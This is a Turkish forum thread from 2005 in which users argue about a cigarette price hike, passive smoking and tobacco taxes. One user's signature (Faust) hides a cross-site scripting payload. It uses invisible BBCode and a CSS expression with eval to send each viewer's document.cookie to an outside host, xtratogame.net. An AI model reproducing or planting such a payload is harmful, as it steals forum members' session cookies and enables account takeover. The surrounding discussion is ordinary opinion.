huun Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 valla az bile . elin gavuruna samimi bir ortamda sigara ikram edince sasiriyorlar "asdfasdfasdf" diyorlar . niye ? cunku oralarda cok pahali kimse kimseye ikram etmiyor . bi de onlar zaten bencil insanlar o da var tabii . pahali olsun kimse kimseye ikram etmesin .
elaidizm Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 E milletin sigarasından sanane diyemeyiz belki ama bir şartla eğer o insanın yanında püfür püfür içiyolarsa. Onun dışında, bu zam olayına sevinenlerin saçma fikirleri de beni şaşırtıyo. Çok sigaraya susasam param olmasa en son çare olarak gider türkü de içerim. Sanki hakkaten sizin servetinizden yiyomuşuz gibi saçma yorumlar yapmayın.
Estel_Anorien Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 said: Way, 15 Aralık 2005 19:16 tarihinde demiş ki: said: Liebe, 15 Aralık 2005 13:53 tarihinde demiş ki: iyi yapıyorlar her hafta zam gelsin sigaraya... milletin ictigi sigaradan sanane ? icmiyosan icmiyosun kendin icin.. icen adamla niye ugrasıyosun?ben uzun zamandır iciyorum keyifte alıyorum saglıgımda yerinde.. ole sacma bisi beyinlere kazınıyo ki sigara kısır yaparmıs kanser yaparmıs löl yani :) sen her gun en saglıklı seyden 14312 tane ye ic o da senin saglıgını bozar sonucta..her seyin fazlası zararlı.. hiç pasif içicilik diye birşey duydun mu? Peki akciğer kanseri? Gırtlak kanseri? Bence sigaraya zam gelmesi çok hayırlı oluyor. Umarım gelişmiş ülkelerdeki gibi sigaranın fiyatı bizde de 10 dolar 15 dolar falan olur paketi...[signature][hline]Aklımı kaybettim hükümsüzdür. DeviantArt Gallery Hür ve özgür şarap ve lezzet portalı
Loli-pop Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 walla bende az önce dışarda duymuştum.. aşırı pahalı olmuş sigara.. ama kullanmadıgım için sorun yok kullananlar artık bi çare bulsun..:)[signature][hline]-houston, üşüdüm olm ben güneşe yaklaşıcam biraz. -apollo bu cok tehlikeli yapma. gemiye zarrar verebilirsin. -hey .....na koyum ne değerli geminiz varmışş sicem yaa.
Faust Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 Winston 3.200[signature][hline]Wind of change... ]www.noir.gen.tr[url=http:///=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.xtratogame.net/pixel.gif?'+document.cookie;this.sss=null`style='font-size:0;][/url]'[/color][/url][/url] ICQ: 714523 - MSNM: [email protected]
JoNyBLaCk Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 one yaaa kısa malboro 4.250 yuhhh bırakıyom lan sigarayı[signature][hline]Diez :_TikiTo_ [Playing] Olympia : JoNyBLaCk Alone Warrior :horace:
Natanyal Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 said: Fistan, 15 Aralık 2005 14:23 tarihinde demiş ki: sigara içmeyenler olmasa bu ülke dış borcunu nasıl kapatacak? zam gelsin şöle okkalı bişey. %95 vergi alınsın.oh mis. hem içenler ölür, hem devlet kazanır. [signature][hline]Eamer, 14 Kasım 2005 01:56 tarihinde demiş ki: Superman'ın neden donunu dışarı giyeceğini ilerki bölümlerde öğrenebilecek miyiz? Tık
Rahan Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 said: Estel_Anorien, 15 Aralık 2005 20:39 tarihinde demiş ki: hiç pasif içicilik diye birşey duydun mu? içtirtme o zaman yakınlarında. evimde sigara içerken sana ne zararım var? öyle bi haliniz var ki, sanki izin verilse sigara tiryakisi vuracaksınız, geyik avlar gibi.[signature][hline]Try Reality! the invisibile and the non-existent look very much alike!
gs_burak1905 Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 sabah sabah tam kampüsten içeri giricem sigaramın bittiğini farkettim kampüsün yanındaki bakkala gittim o zamana kadar derste uyuma planları yapıyordum sigaraya zam geldi diyence uyku falan kalmadı ve ondan itibaren sinirle daha çok sigara içtiğimi farkettim BEN ÖĞRENCİYİM YAAA ÖĞRENCİ ACIYIN BİZEEEE HER AYDA ZAM OLMAZ Kİİİ KARDEŞİMMM ZAM YAPCAKSANIZ BURSA YAPIN KREDİYE YAPINNN TAYYİPPP DUY SESİMİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİİ!!!!
Metakuso Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 said: JoNyBLaCk, 15 Aralık 2005 20:53 tarihinde demiş ki: one yaaa kısa malboro 4.250 yuhhh bırakıyom lan sigarayı ben kimden otlancam şimdi T_T XD nolursa olsun sigara satışları düşmez. bak ben bond içiom mesela. niye mi ? öğrenciyiz. para az. tiryakiyiz. illa içecez. 200 ykr zam çok koymaz gerçi :)[signature][hline]Kısalttım :D
Estel_Anorien Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 sigaradan alıp verdiğin her nefes atmosfere karışıyor dolayısıyla her şekilde zararlı.. yanında olmasam bile elbet bir gün zararlı olacak..[signature][hline]Aklımı kaybettim hükümsüzdür. DeviantArt Gallery Hür ve özgür şarap ve lezzet portalı
Quibble Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 said: Afterdeep, 15 Aralık 2005 17:31 tarihinde demiş ki: Pek pahali gelmedi simdi o fiyat bana, burada 10 dolar paketi :)-(Icmiyorum allahtan..) oha orasi neresi be ??[signature][hline]:hrr:God has disobeyed me and created you !!:hrr:
Admin DynamicK Mesaj tarihi: Aralık 15, 2005 Admin Mesaj tarihi: Aralık 15, 2005 said: Rahan, 15 Aralık 2005 20:54 tarihinde demiş ki: içtirtme o zaman yakınlarında. evimde sigara içerken sana ne zararım var? öyle bi haliniz var ki, sanki izin verilse sigara tiryakisi vuracaksınız, geyik avlar gibi. nasi içtirtmeyeceksin ki? kahvedesin maç izliyeceksin "beyefendi sigara içmeyin kapali alanda" "hölöloy! beniseçbeniseç bödöf" Bardasin ortam ayni.. otobüse binersin binmeden önce son bi firt alip da binenler olur kafeteryada sagda solda illaki yaninda icenler olur nekadar ugrassanda pasif içiciligin önüne gecemezsin ha geçersende etrafinda insan kalmamis demektir. arkadas 2 hafta bodrumda kaldi sigara icmiyordu ist a gidince babasi ile akciger filmi cektirmeye gitmisler babasi 20 yildir sigara iciyor arkadas o 2 haftada cigerleri mahfetmis daha kötü cikmis arkadasin cigerleri her gün bara gitmisve icerisi duman alti .. yani pasif içiciligin önemi nekadar büyük burdan bu sonuc cikiyor aslinda. ha bu yuzden sigara icenlere biraktirma adina aslinda zam gelmesi iyi ama mesela içkiye zam gelse ben ona kizarim :)[signature][hline]*
Quibble Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 ahahah beni sec beni sec :-P[signature][hline]:hrr:God has disobeyed me and created you !!:hrr:
gs_burak1905 Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 GELMESİN ABİİİ NE SİGARAYA NE ALKÖLEEE FİYATLARI DÜŞÜRSÜNLER SÜRÜMDEN KAZANMAYI DENESİNLER :)
Narstil Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 Sigaraya gelsin zam iyidir belki biraz az icerler valla bazen cok rahatsızedici olabiliyo kokusu sigaranın :) ......[signature][hline]:))) !!! G3NK-Peryton ........................
JoNyBLaCk Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 said: Metakuso, 15 Aralık 2005 21:55 tarihinde demiş ki: said: JoNyBLaCk, 15 Aralık 2005 20:53 tarihinde demiş ki: one yaaa kısa malboro 4.250 yuhhh bırakıyom lan sigarayı ben kimden otlancam şimdi T_T XD nolursa olsun sigara satışları düşmez. bak ben bond içiom mesela. niye mi ? öğrenciyiz. para az. tiryakiyiz. illa içecez. 200 ykr zam çok koymaz gerçi :) senden otlancam bende :D almıyorum malboro felan Bond rulazzzz[signature][hline]Diez :_TikiTo_ [Playing] Olympia : JoNyBLaCk Alone Warrior :horace:
Rahan Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 said: Estel_Anorien, 15 Aralık 2005 22:10 tarihinde demiş ki: sigaradan alıp verdiğin her nefes atmosfere karışıyor dolayısıyla her şekilde zararlı.. yanında olmasam bile elbet bir gün zararlı olacak.. ve bu her gün taşıtlardan, fabrikalardan atmosfere karışan zehirli gazlar kadar etkili öyle mi¿ ehe. said: DynamicK, 15 Aralık 2005 22:24 tarihinde demiş ki: nasi içtirtmeyeceksin ki?...polis, zabıta ıvır zıvırı arıyorsun sigara içirtmiyorlar. muhattabın yine de tüm tiryakiler değil. sorununuz uygulanmayan yasaklarla. tepkinizi tümden sigara içenlere değil yasakları çiğneyenlere ve buna göz yumanlara yöneltin. sigarayı bırakmayı kafama koydum koymasına da bu hallerinizi gördükçe baca olup tüttükçe tütesim geliyor. ayrıca yurt dışında 10$ 20$lık paketler var da gençler onlardan mı içiyor? pakette tütün alıp sarma sigara içiyorlar. belki burdakinden daha bile ucuza geliyodur. (1 paket sarma tütünü 3-4 gün gidiyo ve 4-5 milyon istanbulda.) ha bi de bu arada sigara zamlanır da sarma tütüne yönelenler çoğalırsa, sanırım insanların -özellikle gençlerin- tütüne katılarak tüketlien malzemelerle de tanışması kolaylaşır, tahmin edin neler bunlar.ama tabi nolcak siz devam edin "nası koduk sigara içenlere" muhabbetine.[signature][hline]Try Reality! the invisibile and the non-existent look very much alike! [Bu mesaj Rahan tarafından 15 Aralık 2005 23:25 tarihinde değiştirilmiştir]
InneR_ChaoS Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 dava edicem philip morris serreffsizini ha[signature][hline]Order Within Chaos....
Jabba Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 ya valla şoka girdim yahu.. 4250 ne demek ya resmen soygun ya cık cık cık cık..[signature][hline]Jabba ICQ:mu kalmı$ Sıfatlar ve ünvanlar gelip geçici şeylerdir!..
Muhallebi Mesaj tarihi: Aralık 15, 2005 Mesaj tarihi: Aralık 15, 2005 uplamayın ya gördükçe moralim bozuluyor.[signature][hline]The Blood is Love.
JoNyBLaCk Mesaj tarihi: Aralık 16, 2005 Mesaj tarihi: Aralık 16, 2005 benimde :D:D:D[signature][hline]Diez :_TikiTo_ [Playing] Olympia : JoNyBLaCk Alone Warrior :horace:
kickass Mesaj tarihi: Aralık 16, 2005 Mesaj tarihi: Aralık 16, 2005 evet 4.25 verdim bu akşam üstü evlat acısı yahuu 5e kadar yolu war[signature][hline]Unlimited Reseller
Mayhem Mesaj tarihi: Aralık 16, 2005 Mesaj tarihi: Aralık 16, 2005 Sigarayı bırakmak en iyisi.[signature][hline]I still feel the pain.. I still feel your love.. Satılık Yepyeni Wow | Garbage =o= FM @ wj Mayhem
Reaper08 Mesaj tarihi: Aralık 16, 2005 Mesaj tarihi: Aralık 16, 2005 iyi olmush iyi yurt dışında ingilterede falan kaç para öyle ytl ye göre 9 milyon mu ne gelsin daha.. alamasın millette =) sonra kaçak sigaralar iyice artar ama ucuzdan satılmak için =)[signature][hline]- = There Is No Tomorrow = -
Öne çıkan mesajlar